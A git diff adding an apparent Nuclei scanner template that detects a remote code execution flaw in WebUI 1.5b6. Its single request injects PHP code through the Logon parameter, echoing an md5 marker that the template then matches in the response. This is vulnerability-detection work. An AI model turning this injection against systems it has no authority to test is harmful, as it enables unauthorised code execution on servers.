diff --git a/vulnerabilities/other/webui-rce.yaml b/vulnerabilities/other/webui-rce.yaml
new file mode 100644
index 0000000000..82d1fab54a
--- /dev/null
+++ b/vulnerabilities/other/webui-rce.yaml
@@ -0,0 +1,24 @@
+id: webui-rce
+info:
+  name: WebUI 1.5b6 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://www.exploit-db.com/exploits/36821
+  tags: webui,rce
+
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "c5b3d7397a90f42d222f7ed9408c0dc6"
+        part: body
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file